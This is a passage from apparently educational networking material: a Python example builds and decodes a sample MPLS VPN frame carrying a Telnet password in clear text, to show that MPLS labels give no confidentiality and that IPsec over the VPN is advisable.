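# Constructed frame: transport label 16004 to the egress PE, VPN label 24 for
# the customer VRF, then the CPE operator's Telnet keystrokes (the password line).
SAMPLE_FRAME = (mpls_entry(16004, ttl=250) + mpls_entry(24, bos=1, ttl=250)
                + build_ipv4_tcp("10.1.0.10", "10.2.0.10", 40123, 23, b"cisco123\r\n"))

if __name__ == "__main__":
    info = decode_mpls_frame(SAMPLE_FRAME)
    print("labels %s  %s:%d -> %s:%d" % (info["labels"], info["src"], info["sport"],
                                         info["dst"], info["dport"]))
    print("clear-text payload:", info["payload"])
```

The inner (VPN) label selects the customer VRF at the egress PE; nothing about it hides the payload, and a misconfigured or malicious provider can attach that label to the wrong VRF, which is the point of the previous slide's advice to run IPsec end to end over the MPLS VPN.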